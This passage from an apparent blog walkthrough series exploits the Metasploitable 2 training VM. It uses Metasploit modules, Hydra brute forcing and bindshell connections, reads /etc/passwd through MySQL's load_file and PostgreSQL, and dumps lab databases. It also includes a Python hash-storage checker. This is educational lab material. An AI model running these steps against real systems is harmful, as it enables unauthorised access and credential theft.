<p>Remove the <em><strong>runme.war</strong></em> file by going back to <strong><em>[Target IP]:8180/manager/html</em></strong> and clicking "Undeploy".</p>
<h2>Exploiting Port 8787 – Distributed Ruby</h2>
<p>Distributed Ruby, or DRb, allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes.</p>
<p>Easy exploit: just load the proper Metasploit module and use it.</p>
<p><a href="https://drive.google.com/uc?id=1dw7ETQk4wVmnTm_B8_Ne13A54GqMZqai" target="_blank"><img width="808" height="292" title="Exploiting Distributed Ruby with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Distributed Ruby with Metasploit" src="https://drive.google.com/uc?id=11bvpaVqdyYeOMSbb1w_xUlms2KMchM2d" border="0"></a></p>
<p>This concludes the Metasploitable 2 exploitation.
In some of the ports/services you can explore other alternatives, but this series of posts illustrates pretty much all there is to it.</p>
<p>The next series of posts will deal with Metasploitable 3 Windows, and that will be somewhat different, especially because the Windows OS and the services installed in that vulnerable VM offer a lot of possibilities…</p>
<p><strong>Next post</strong>: <a title="Metasploitable 3 Windows Walkthrough: Part I" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-3-windows-walkthrough_34.html">Metasploitable 3 Windows Walkthrough: Part I</a></p>

<p><em>Metasploitable 2 Walkthrough: Part IX</em> (Rui Natário, published 2020-11-04, updated 2020-11-21)</p>
<h2>Exploiting Port 5900 – VNC</h2>
<p>The Virtual Network Computing (VNC) service can be exploited using a Metasploit module that finds the login credentials.</p>
<p><a href="https://drive.google.com/uc?id=1loKmQXPtu53JLftjbXmh7_2OZZRGZhuW" target="_blank"><img width="810" height="202" title="Brute forcing VNC with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing VNC with Metasploit" src="https://drive.google.com/uc?id=1l5PjU_TrcO-NZelfyk7xK1pR9hiJD2Ow" border="0"></a></p>
<p>Now, connect using VNC Viewer:</p>
<p><a href="https://drive.google.com/uc?id=1Z8yI2FCcdIXUezWSpytvkLVC6xQ6_Avs" target="_blank"><img width="723" height="292" title="Connecting to VNC Viewer" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to VNC Viewer" src="https://drive.google.com/uc?id=1UxvgNSqtB9N_iyIs59Pz9yepIGHmDNO8" border="0"></a></p>
<p>The credentials work, and a remote desktop session pops up in Kali.</p>
<p><a href="https://drive.google.com/uc?id=1PC-iXWdoWtjua6ReDRl2y7i5aO4iXKc0" target="_blank"><img width="727" height="474" title="VNC Viewer shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="VNC Viewer shell" src="https://drive.google.com/uc?id=1uIsE1dG74ty1VYH8jB9D47x01hOjpIwQ" border="0"></a></p>
<p>And you have another root shell.</p>
<h2>Exploiting Port 6667 – Unreal IRCd</h2>
<p>Unreal IRCd can be exploited using a Metasploit module created to connect to a malicious backdoor present in the Unreal server.</p>
<p><a href="https://drive.google.com/uc?id=1JP138TiWUohZ0gNlDNOt-Zgxt-e6G1TO" target="_blank"><img width="835" height="480" title="Exploiting Unreal IRCd with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Unreal IRCd with Metasploit" src="https://drive.google.com/uc?id=1d5HbMpKNjVYt0el-Mg4go0TK9ZgOhJDa" border="0"></a></p>
<p>And you have another root shell.</p>

<p><em>Metasploitable 2 Walkthrough: Part VIII</em> (Rui Natário, published 2020-11-04, updated 2020-11-21)</p>
<h2>Exploiting Port 3632 – DistCC</h2>
<p>distccd is the server for the DistCC distributed compiler. It accepts and runs compilation jobs for network clients. Metasploit has a module to exploit this service.</p>
<p><a href="https://drive.google.com/uc?id=1nQvvtGwj_UvE3rWIVeCq-DHh05rETRMl" target="_blank"><img width="837" height="414" title="Exploiting DistCC with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting DistCC with MSF" src="https://drive.google.com/uc?id=1sn3iTgiUS0uHSt6f6fNLPO0zPpo_gpKu" border="0"></a></p>
<p>This is another low privileged account.</p>
<h2>Exploiting Port 5432 – PostgreSQL</h2><p>One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name.<p>Fortunately, PostgreSQL ships with a default database called <b><em>template1</em></b>, the template from which all other databases are created. This means that you can (probably) always find a database named template1 on any PostgreSQL server.<p>There is also a <b><em>template0</em></b> database, which contains no local settings and is even more basic than template1, so there should always be at least these two known databases in any PostgreSQL service.<a name="more"></a><h3>Brute forcing PostgreSQL using Metasploit</h3><p>There are several Metasploit modules to be used against PostgreSQL, but you should start with the one that might give you access to the database.<p>The procedure is exactly the same as for the previous services:<ul><li>Load module</li><li>Check default options</li><li>Select user and password files, or other creds</li><li>Run module</li></ul><p><a href="https://drive.google.com/uc?id=1FXxHGD5MOjI2HNaqX5lMGHSyu0igqaao" target="_blank"><img width="842" height="299" title="The Metasploit PostgreSQL login module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The Metasploit PostgreSQL login module" src="https://drive.google.com/uc?id=1j5wzLkHfQWhzLYAbQRkjvqfA0DdnqwiO" border="0"></a><p>Try to run the module with the default settings, adjusting only the IP of the target machine.<p><a href="https://drive.google.com/uc?id=1StkqWsURFx6PreoqpHh_bvFNuw8CM8TC" target="_blank"><img width="737" height="191" title="Running the PostgreSQL login module with default settings" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the PostgreSQL login module with default settings" src="https://drive.google.com/uc?id=1KTp09GKl-lo-n0G6S_IuojDZMalhFgFp" border="0"></a><p>Another option is to use the credentials previously found and stored in the workspace.<p><a href="https://drive.google.com/uc?id=1VmME2Ty37kYNk3EsHpc4FyddcrdK9hkf" target="_blank"><img width="749" height="303" title="Running the PostgreSQL login module with custom settings" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the PostgreSQL login module with custom settings" src="https://drive.google.com/uc?id=1mHfZaTXEvkr3VYFbmWXGeGwJtKNt16gy" border="0"></a><p>In this case, the result is exactly the same.<p>Now that you have login credentials for the PostgreSQL server, use them to do admin work such as running arbitrary SQL statements against Postgres.<p><strong><em>NOTE:</em></strong> Brute forcing the service using Hydra is exactly the same as for the previous services.<h3>Exploiting PostgreSQL using Metasploit</h3><p>Load the auxiliary admin module to run SQL commands:<p><a href="https://drive.google.com/uc?id=12b47XI7eBYWx8pEtbUMPlKWapc9TUXny" target="_blank"><img width="837" height="190" title="The Metasploit PostgreSQL admin module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The Metasploit PostgreSQL admin module" src="https://drive.google.com/uc?id=1n5xBWqWcO1Uz4uEpeH9n36gX1-t_EXrQ" border="0"></a><p>As you can see, the default options are almost perfect. 
Try to get the names of the existing databases:<p><a href="https://drive.google.com/uc?id=1G7HjQHyL1Z6l1nOMybNVXQ1ZKGwRrKp6" target="_blank"><img width="832" height="174" title="Running the Metasploit PostgreSQL admin module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the Metasploit PostgreSQL admin module" src="https://drive.google.com/uc?id=1vSWoaBErfmFIkPDpQUBjJ3GRvXLttf-k" border="0"></a><p>Postgres implements its databases differently from MySQL, so to list all the databases you need a different command than "SHOW DATABASES". For PostgreSQL, you can query the <b><em>pg_database</em></b> system catalog.<p>The following SQL command gets the names of the databases from pg_database:<p><strong><em>select datname from pg_database;</em></strong><p>The following also works:<p><strong><em>select pg_database.datname from pg_database;</em></strong><p><a href="https://drive.google.com/uc?id=1on-lmCFqri4n2FrddA6Dm8VpD8DZ6WiA" target="_blank"><img width="768" height="270" title="Running the Metasploit PostgreSQL admin module with proper command" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the Metasploit PostgreSQL admin module with proper command" src="https://drive.google.com/uc?id=18SZuK1NDsZlJ3lvfVX8vx3GrW2c_nDvd" border="0"></a><h4>Getting the /etc/passwd using PostgreSQL</h4><p>With MySQL, you were able to obtain files on the remote machine using the SQL statement <code><i>select load_file('/etc/passwd')</i></code><i>.</i> However, the <code><i>load_file</i></code> function isn't available in PostgreSQL.<p>PostgreSQL has a <code><b>load</b></code> command, so try that instead:<p><strong><em>load '/etc/passwd'</em></strong><p><a href="https://drive.google.com/uc?id=146TQgI7kNNK1GaSfIb9NyBSi7UZg9uVK" target="_blank"><img width="828" height="133" title="Trying to read the /etc/passwd with postgres" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Trying to read the /etc/passwd with postgres" src="https://drive.google.com/uc?id=1wLfL5TZ645q2mZEcW3Uo0JFqKLJABRb-" border="0"></a><p>This has a problem: <b><em>invalid ELF header</em></b>. The error makes sense, because PostgreSQL's <code>load</code> loads a shared library (an ELF binary) into the server process, so a text file such as /etc/passwd is rejected. So, this module doesn't allow you to read files as easily as, say, MySQL. Maybe you can try a different module.<p><a href="https://drive.google.com/uc?id=1F__OrwyKBaVaaBM7niBcd6KHg-4NwHRI" target="_blank"><img width="820" height="197" title="The Metasploit PostgreSQL readfile module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The Metasploit PostgreSQL readfile module" src="https://drive.google.com/uc?id=1R6T11PzM122FV2brxN30xALd3XWcWbc9" border="0"></a><p>Again, almost perfect default options.<p><a href="https://drive.google.com/uc?id=1bXz3KMR9bhCsgbS2x9HgVGJ0esFMtPYq" target="_blank"><img width="754" height="369" title="Reading the /etc/passwd with postgres" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Reading the /etc/passwd with postgres" src="https://drive.google.com/uc?id=1xu5n7500PPhTh9rRCR1IvFBp1zUdj664" border="0"></a><p>It works perfectly, with an important bonus. Take a look at the end of the module output:<p><a href="https://drive.google.com/uc?id=11AvxXRXglllOhbDqrtJDsCUchV91bax3" target="_blank"><img width="801" height="69" title="MSF readfile module output" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF readfile module output" src="https://drive.google.com/uc?id=1IIAUPUP2Pqsa_zb29mnGEy8lqDc3K73h" border="0"></a><p>The contents of /etc/passwd were saved inside the workspace for later use. 
You can see it with the <em><b>loot</b></em> command:<p><a href="https://drive.google.com/uc?id=1N7xLkvlszHmM2EHprXchT2myRm83QTFu" target="_blank"><img width="791" height="90" title="The MSF loot command" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The MSF loot command" src="https://drive.google.com/uc?id=1mILND7xUSDztpktWPqLL_uXYHBhJWNWV" border="0"></a><h4>Delivering a payload with PostgreSQL</h4><p>To deliver a payload, use the payload module associated with PostgreSQL.<p><a href="https://drive.google.com/uc?id=1QhsI2mZk0cd9uRj6Qvgycy8Z_MoQSNKa" target="_blank"><img width="821" height="592" title="Delivering a payload with postgres" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Delivering a payload with postgres" src="https://drive.google.com/uc?id=1PEy0372EXHgRx1k-k2dU4P-RO10jfJXH" border="0"></a><h3>Dumping the PostgreSQL database</h3><p>To dump the contents of a PostgreSQL database, use the <code><b><em>pg_dump</em></b></code> command.<p>You can check all the flags with <code>man pg_dump</code>, but the basic ones you will need are:<ul><li>Username</li><li>Password (pg_dump has no option to pass the password on the command line; it prompts for it, or reads it from the <code>PGPASSWORD</code> environment variable or a <code>~/.pgpass</code> file)</li><li>Database (one of the three above: postgres, template0, or template1)</li><li>Table (you can use wildcards to match table names)</li><li>A file to capture all the output</li></ul><p><a href="https://drive.google.com/uc?id=1WLRjfSkj0HjyH9uNrFUcH00ig67EvlNH" target="_blank"><img width="834" height="445" title="Dumping the database with pg_dump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the database with pg_dump" src="https://drive.google.com/uc?id=1YFxE5HPcs0KBspEzVtNHmomjAiKIKDvq" border="0"></a></p><p>Like mysqldump, pg_dump will output the SQL commands required to exactly replicate the database and tables selected.<p>However, unlike mysqldump, postgres implements an additional 
layer, implemented within SQL itself, that enables a lot of additional functionality. It consists of system catalogs and tables for PostgreSQL user management and function definitions.<p>While this represents a huge attack surface that would make malicious code difficult to find, this PostgreSQL database does not appear to be used for anything. The port is open and the server is listening, but there is no purpose. (Other than to provide Metasploitable users another route into the machine.)<p>That means that <code><strong><em>--table='*'</em></strong></code> will dump out a lot of superfluous stuff.Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-86038967240916172512020-11-04T09:02:00.000-08:002020-11-21T00:13:49.137-08:00Metasploitable 2 Walkthrough: Part VII<h2>Exploiting Port 3306 – MySQL</h2><p>MySQL is an open-source relational database management system. A relational database organizes data into one or more tables in which the data may be related to each other.</p><p>There are several possibilities to explore when connecting to the MySQL service running on the Metasploitable 2 VM.</p><h3>Blank password</h3><p>The MySQL database in Metasploitable 2 has negligible security, so you can connect to it using the mysql client in Kali by specifying only the username and the host IP. 
The password will be left blank.<p><a href="https://drive.google.com/uc?id=1bi2-oTHMmkNp9p3UBxnwcKv4WdkEV8K1" target="_blank"><img width="637" height="203" title="Connecting to SQL without password" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to SQL without password" src="https://drive.google.com/uc?id=1VwovAJTiS_TcqS6lo29mWXXM60AltNzI" border="0"></a><p>Once you have root access to the database you can do anything.<a name="more"></a><h3>Brute forcing MySQL using Hydra</h3><p>Brute forcing MySQL is in essence the same as brute forcing any other application, and therefore similar tools and techniques can be used:<p><a href="https://drive.google.com/uc?id=1uu1bpUcLri0fgMPCRLwls8ZnxqldjnMD" target="_blank"><img width="823" height="111" title="Brute forcing MySQL with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Hydra" src="https://drive.google.com/uc?id=15hhZhno9HoGwIv7O8QIyNT5gXlVomF6I" border="0"></a></p><h3>Brute forcing MySQL using Metasploit</h3><p>Use the proper auxiliary module. Note that in order to use this successfully, you'll need wordlists for username and password combinations. Try using a single user (root) and the <strong><em>rockyou</em></strong> list for passwords:<p><a href="https://drive.google.com/uc?id=1bAihXKR9MglvLUtCFey5EluDBdAYOAtD" target="_blank"><img width="839" height="294" title="Brute forcing MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Metasploit" src="https://drive.google.com/uc?id=1IgNqp0plfoipChK4QRBC7EbVEfHMcHrL" border="0"></a><p>The result is the same as before: the root account has a blank password.<h3>Exploiting MySQL using Metasploit</h3><p>Once you have credentials to connect to the MySQL server, you will want to pivot from recon mode to attack mode. 
This means you'll be using different modules from MSF: whereas the initial module was a scanner, the subsequent ones are admin modules.<p>There are two different ways to exploit the MySQL server to obtain system information and database information. These are covered below.<p>The <code><b><em>mysql_sql</em></b></code> auxiliary module can be used to connect to the remote database and execute SQL commands. As an example, execute MySQL's <code><b><em>load_file()</em></b></code> function to read the contents of the <code><em><strong>/etc/passwd</strong></em></code> file and get a list of users on the system.</p><p><a href="https://drive.google.com/uc?id=1ZrUMVaNrb4bMo34VmCOabxcGRg2_yCFD" target="_blank"><img width="770" height="975" title="Executing SQL commands with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing SQL commands with Metasploit" src="https://drive.google.com/uc?id=10H5Z_OXIVaCktjsxU56Y6s5GRrwvTsmG" border="0"></a><h3>Enumerating MySQL users with Metasploit</h3><p>This module will enumerate all of the MySQL accounts on the server and their various privileges.<p><a href="https://drive.google.com/uc?id=1YqNtV15mj9FFjnzQbp8rLs5cBfE214Fa" target="_blank"><img width="764" height="1021" title="Enumerating MySQL users with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL users with Metasploit" src="https://drive.google.com/uc?id=15Hsf-SXWQRA_aetWkOut9sHRe5mKhPuA" border="0"></a><p>Since we already have access to the root user in MySQL, there's no need to brute force other login names. 
However, if there were many users in a complex database, this might yield a treasure trove of usernames with different privileges, allowing you to see different sections of the database.<p>Take a look at the credentials you have stored so far:<p><a href="https://drive.google.com/uc?id=1OA0KvgwpZGOXR1FVqjFlgvWUsar56EDL" target="_blank"><img width="768" height="191" title="Credentials stored in the MSF database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Credentials stored in the MSF database" src="https://drive.google.com/uc?id=1L20pdXlHZTc0JE4lLgbCgon56myzthve" border="0"></a><h3>Dumping the MySQL database contents</h3><p>Use the <b><em>show databases</em></b> SQL command to list the databases available.<p><a href="https://drive.google.com/uc?id=1vGn-GQj0OmjrofD05f_TpZfgz5px5DDL" target="_blank"><img width="732" height="450" title="Dumping the MySQL Database contents" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the MySQL Database contents" src="https://drive.google.com/uc?id=1LTPj7-kE-OqHVd8-8fb9dmvelAY6S2zH" border="0"></a><p>Use the <b><em>use [database name]</em></b> SQL command to select a particular database.<p><a href="https://drive.google.com/uc?id=1Rz9VBQEllxPUfDjEuuhxueAmzAdLplKC" target="_blank"><img width="605" height="124" title="Selecting the database to use" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting the database to use" src="https://drive.google.com/uc?id=1A4Wz9o2JVscbZjWwo-X0b_DSrjb08aBn" border="0"></a><p>Once you've selected a particular database, you can start to explore it. 
<p><a href="https://drive.google.com/uc?id=1x8wdFSBlvngcQQlQC1ymTZ2HelSoiaJR" target="_blank"><img width="304" height="241" title="Exploring the database contents" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploring the database contents" src="https://drive.google.com/uc?id=1i9texZYoO8-BtQSE_97sMpEbwY6B4Lib" border="0"></a><p>Select a different database and explore it:<p><a href="https://drive.google.com/uc?id=1IDm_HNUrI7dC10GMIDfODUizWzTlIhy0" target="_blank"><img width="709" height="389" title="Selecting and exploring a different database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting and exploring a different database" src="https://drive.google.com/uc?id=1nGRhhMG13pm_uxdxjC0L0muUos1beDrs" border="0"></a><p>You can use the <b><em>describe</em></b> command to describe the fields in each SQL table, as well as their data types.<p><a href="https://drive.google.com/uc?id=1wTVyo3_iBJhW7GbdK3LmaLxNl4JzeEGk" target="_blank"><img width="711" height="287" title="Describing the accounts table" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Describing the accounts table" src="https://drive.google.com/uc?id=1mHBHSBtVK3ZS8ijpop0euhF7bt8_WGM1" border="0"></a><p><a href="https://drive.google.com/uc?id=1mLm_P6XieAPHaaDEtCE00FfNvtvOp2RD" target="_blank"><img width="716" height="273" title="Describing the credit cards table" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Describing the credit cards table" src="https://drive.google.com/uc?id=1waj35fXeXp8Ljx5adQrMJOKiFOW-OUlI" border="0"></a></p><h3>Dumping the MySQL database contents using mysqlshow</h3><p>You can also use <b><em>mysqlshow</em></b> to easily show the contents of the database. 
Use the <b><em>--host</em></b> option to point it at a remote database.<p><a href="https://drive.google.com/uc?id=13fP4GoSKDSQCnWEiaSSFkr8fbA9bqQtZ" target="_blank"><img width="582" height="657" title="Dumping the MySQL database with mysqlshow" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the MySQL database with mysqlshow" src="https://drive.google.com/uc?id=1oxaXMWaRnEqfd4k-yJVC17F_x4_hYD2u" border="0"></a><h3>Dumping the MySQL database contents using mysqldump</h3><p>Like the mysqlshow command, the <b><em>mysqldump</em></b> command accepts the <em><strong>--host</strong></em> argument. To dump a table, run the command like this:<p><strong><em># mysqldump --host=10.0.0.27 [database] [tablename]</em></strong><p>This will result in an SQL script that will recreate the entire database from scratch. Be careful and make sure you run <code><b><em>mysqlshow --count</em></b></code> first, to avoid dumping out a 500 GB database.<h4>DVWA</h4><p>Try it with the <b><em>dvwa</em></b> database:<p><a href="https://drive.google.com/uc?id=1uriMh7OqCelYiN_5cYWorH4KPBwNKb9_" target="_blank"><img width="450" height="218" title="Counting the dvwa database with mysqlshow" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Counting the dvwa database with mysqlshow" src="https://drive.google.com/uc?id=13XY45zUdJ_vVQxKhtAp5X0PqGVHYNKo-" border="0"></a><p>Unfortunately, the current version of mysqldump doesn’t work with the currently available version of Metasploitable 2. 
An older Kali version (2015) will work just fine, and dumping the <b>dvwa</b> web app's database reveals some usernames and password hashes.<p><a href="https://drive.google.com/uc?id=1PPKDeIXEDhAzokJAofsN8ziV-QxaUkrf" target="_blank"><img width="709" height="139" title="Dumping the dvwa database with mysqldump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the dvwa database with mysqldump" src="https://drive.google.com/uc?id=1WGDvv8_gaf3jgBUTH2YIKU7ffkBG_7QJ" border="0"></a><p><a href="https://drive.google.com/uc?id=1Iz4NAqSQrm2JKMYzfNDwgjRKVEN-u5Ry" target="_blank"><img width="810" height="156" title="Table users in the dvwa database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Table users in the dvwa database" src="https://drive.google.com/uc?id=1Iddlp5TqFqoDV9Oj27Sv_PX7mX51EZAn" border="0"></a><p>From this, we can see a couple of interesting things.<p>First, we have 5 users in this web app. The password field of the table consists of strings of 33 characters, in hex. You can use <a href="https://charlesreid1.com/wiki/Hash-Identifier" target="_blank">Hash-Identifier</a> to identify the hash.<p><a href="https://drive.google.com/uc?id=1j6RdjiIMjQ72stnUeQ_-yP5lt4aTw9rC" target="_blank"><img width="786" height="410" title="Running Hash Identifier" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running Hash Identifier" src="https://drive.google.com/uc?id=1hAaRX5GCDp84LDEjFC9-XVIKJECKvE2g" border="0"></a><p>Looks like it is an MD5 hash. 
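<p>Hash-Identifier's verdict above rests only on the shape of the string: its length and alphabet. The following is an added example, not code from the original post and not the Hash-Identifier tool itself, that makes the same judgement for a whole password column and flags the storage formats a reviewer would want replaced: plaintext and bare, unsalted fast digests. The sample column is constructed here; it is not the dvwa or owasp10 data.</p>

```python
"""Classify stored password values by shape, the way Hash-Identifier does.

Added example, not code from the original post or from Hash-Identifier.
A classifier can only say which algorithms *fit* a string; it cannot
prove which one produced it. The sample column below is constructed.
"""
import hashlib
import re
from typing import Dict, List

# Output sizes of common unsalted digests, in hex characters (facts about
# the algorithms themselves). Several algorithms share a size, so each
# entry is a list of candidates.
HEX_DIGEST_LENGTHS = {
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256", "SHA3-256"],
    128: ["SHA-512", "SHA3-512"],
}

# Salted formats announce their algorithm in a crypt(3)-style prefix or a
# marker, so they are unambiguous.
PREFIXED = [
    (re.compile(r"^\$1\$"), "md5crypt"),
    (re.compile(r"^\$2[aby]\$\d{2}\$"), "bcrypt"),
    (re.compile(r"^\$5\$"), "sha256crypt"),
    (re.compile(r"^\$6\$"), "sha512crypt"),
    (re.compile(r"^\*[0-9A-F]{40}$"), "MySQL 4.1+ (SHA-1 based)"),
]

HEX = re.compile(r"^[0-9a-fA-F]+$")


def identify_hash(value: str) -> List[str]:
    """Return the candidate algorithms for `value`, or [] if nothing fits."""
    value = value.strip()
    for pattern, name in PREFIXED:
        if pattern.match(value):
            return [name]
    if HEX.match(value):
        return list(HEX_DIGEST_LENGTHS.get(len(value), []))
    return []


def is_unsalted_digest(value: str) -> bool:
    """True when the value is a bare hex digest with no salt or work factor."""
    value = value.strip()
    return bool(HEX.match(value)) and len(value) in HEX_DIGEST_LENGTHS


def weak_storage_report(values: List[str]) -> Dict[str, str]:
    """Flag values that should not be stored this way: plaintext or a fast unsalted digest.

    Salted, iterated formats (bcrypt, sha512crypt, ...) are not reported.
    Anything that matches no known shape is assumed to be plaintext.
    """
    findings = {}
    for value in values:
        candidates = identify_hash(value)
        if not candidates:
            findings[value] = "no recognised hash shape: likely plaintext"
        elif is_unsalted_digest(value):
            findings[value] = "unsalted fast digest (" + "/".join(candidates) + ")"
    return findings


# Constructed sample column: one MD5, one sha512crypt, one plaintext value.
SAMPLE_PASSWORD_COLUMN = [
    hashlib.md5(b"constructed-example").hexdigest(),
    "$6$constructedsalt$" + hashlib.sha512(b"constructed").hexdigest()[:86],
    "Summer2020!",
]

if __name__ == "__main__":
    for value, verdict in weak_storage_report(SAMPLE_PASSWORD_COLUMN).items():
        print(f"{value[:24]:<24} {verdict}")
```

<p>The report deliberately treats an unrecognised value as plaintext rather than as an exotic hash; on a real table that is the conservative reading, and a false positive there costs one manual look.</p>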
My advice: pay attention to the gathered info, but don’t waste time trying to crack this.<h4>OWASP10</h4><p>The owasp10 database has some very good info too.<p>One table has plain-text passwords:<p><a href="https://drive.google.com/uc?id=1hBTtkVBLoQjKjeMsR2dAmn6tW5cBenGq" target="_blank"><img width="798" height="141" title="Table users in the owasp10 database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Table users in the owasp10 database" src="https://drive.google.com/uc?id=1N7sQly0jl97a1ukbr9hbql259qLNcOzQ" border="0"></a><p>Another has credit card details:<p><a href="https://drive.google.com/uc?id=1S65z2O3NtyPIV98muDzEnn2rMB_EzUno" target="_blank"><img width="780" height="97" title="Table credit cards in the owasp10 database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Table credit cards in the owasp10 database" src="https://drive.google.com/uc?id=1NQxfrBQrzt1IxEjfumARzeBlgiASdbHi" border="0"></a></p><p>Several other tools can be used to enumerate and exploit this MySQL database, but all revolve around the same basic procedures.<p><strong>Next post</strong>: <a title="Metasploitable 2 Walkthrough: Part VIII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-viii.html">Metasploitable 2 Walkthrough: Part VIII</a></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com2tag:blogger.com,1999:blog-6396309617370994433.post-22733701214994002982020-11-04T04:51:00.000-08:002020-11-21T00:12:39.335-08:00Metasploitable 2 Walkthrough: Part VI<h2>Exploiting Port 1009 – Java RMI</h2><p>GNU Classpath is a set of essential libraries for supporting the Java programming language. 
The Metasploitable VM runs a remote object registry for GNU Classpath using default credentials, which can be leveraged to gain a shell on the machine using the Java RMI Server Insecure Default Configuration Java Code Execution Metasploit module.<p>This exploit is quite straightforward: just choose the exploit, set the proper options and run it.<p><a href="https://drive.google.com/uc?id=18m3byKNCVDU6moapW0eI8Id_DXLSbpp7" target="_blank"><img width="829" height="674" title="Exploiting Java RMI with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Java RMI with MSF" src="https://drive.google.com/uc?id=1DsLoGZyWrAgbEG0-TnihuwhylN4Gpy4T" border="0"></a><p><b>NOTE</b>: After this exploit you will need to reboot Metasploitable 2, as the VM goes to 100% CPU.<p><b>NOTE</b>: There is another exploit available for this port (<b><em>exploit/multi/browser/java_rmi_connection_impl</em></b>), but it only creates a local listener ready to accept connections from the Metasploitable machine. It can be used in conjunction with the previous exploit or with other malicious Java implants to create persistence on the target machine.<a name="more"></a><h2>Exploiting Port 1524 – Shell</h2><p>Many attack scripts install a backdoor shell on this port.</p><h3>Exploiting Bindshell service</h3><p>Metasploitable 2 comes with an open bindshell service running on port 1524. Use Netcat to connect to it.<p><a href="https://drive.google.com/uc?id=16O5FVnyjwEDQQk02L2gQ9XbPegdRQmPb" target="_blank"><img width="508" height="151" title="Connecting to Bindshell with Netcat" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to Bindshell with Netcat" src="https://drive.google.com/uc?id=1pbQ2fZ0oe-r5AL8zXWM9uMzLSJinQuIz" border="0"></a><h3>Exploiting Ingreslock service</h3><p>Ingreslock is used legitimately to lock parts of an <strong><em>Ingres</em></strong> database. 
However, there are known trojans that also use port 1524 as a backdoor into a system. Some sysadmins allow this port to be open, thinking it is needed.<p>This vulnerability could fall into the same group as Telnet and rlogin, in the sense that it can be used as an unintentional backdoor. All you need to do is connect via Telnet to the port to gain access to the victim’s machine. You will be logged in with the same rights as the user the service is running as.<p><a href="https://drive.google.com/uc?id=17esk7EWUFMC51Ogi9tgdMU2v78Y-K-Hz" target="_blank"><img width="501" height="183" title="Connecting to Ingreslock via Telnet" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to Ingreslock via Telnet" src="https://drive.google.com/uc?id=1XPU5uLtASdob_SOk61bNTXAlmjZsOXyb" border="0"></a><h2>Exploiting Port 2121 – ProFTPD</h2><h3>Telnet access</h3><p>Connect to the target machine’s port 2121 via Telnet using the default credentials for Metasploitable 2.<p><a href="https://drive.google.com/uc?id=1iBLRWvv7pQqgCWiTXmaMhjsfpaEZ1AT6" target="_blank"><img width="489" height="250" title="Connecting to ProFTPD via Telnet" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to ProFTPD via Telnet" src="https://drive.google.com/uc?id=1QNent78zXJkuwxwNoLfXUWOENSlprlFd" border="0"></a><h3>FTP access</h3><p>The FTP access can be brute forced exactly as you did for the vsFTPd server running on port 21. Likewise, connecting to ProFTPD is a normal FTP connection. 
Try using the “user” account:<p><a href="https://drive.google.com/uc?id=1_3TBDBewkmJm7rDwQtuX0nTP7KnpL-hf" target="_blank"><img width="722" height="459" title="Connecting to ProFTPD" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to ProFTPD" src="https://drive.google.com/uc?id=1eGc9ufnUk6V37w6NmYi0k486uUyJaspM" border="0"></a><p>From here you can GET these files and open them to extract additional info. Or you can try to log in with one of the other accounts.<h2>Exploiting Port 2049 – NFS</h2><p>The Network File System is a distributed file system protocol that allows a user on a client computer to access files over a network in the same way they would access a local file.<h3>Connecting to NFS</h3><p>Start by checking which RPC services are running; use the <b>rpcinfo</b> command to do that:<p><a href="https://drive.google.com/uc?id=1ddBNYD5zn0g18EU0rh1fPtqG49dQHlBw" target="_blank"><img width="418" height="309" title="Checking out running network services" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking out running network services" src="https://drive.google.com/uc?id=1AqNTSqNXJi2j9JqS06ks6sf3ee9LabNt" border="0"></a><p>There is an 